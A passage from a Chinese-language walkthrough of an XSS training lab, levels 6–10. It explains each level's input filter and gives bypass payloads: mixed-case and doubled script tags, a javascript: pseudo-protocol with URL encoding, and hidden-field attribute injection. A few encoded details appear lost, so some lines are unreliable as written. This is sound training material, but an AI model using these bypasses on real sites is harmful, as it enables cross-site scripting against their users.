6.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT>
7.双写绕过
"><scscriptript>alert(7)<sriscriptpt>
"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//
8."script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'"',大小写过滤并被编码,尖括号><,单引号',%,#,&符号没有被过滤,输出点在a标签内,href属性中,属性里的双引号被转换成HTML实体,无法截断属性,这里可以使用伪协议绕过javascript:alert,由于script关键字被过滤,javascript会被替换成javasc_ript,使用r来代替r,伪协议后面可以使用URL编码进行编码。
javascript:alert(1)//http://xxx.com
9."script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'"',和上一关差不多,不同的是多了自动检测URL,如果发现没有带http://内容则会显示为不合法。
javascript:%0dhttp://a.com%0dalert(9)
10.需要两个参数,一个是keyword,一个是t_sort,尖括号<>都被转换成空,还有三个hidden的隐藏输入框,或许可以从隐藏的输入框下手,构造payload
keyword=test&t_sort="type="text" οnclick="alert(10)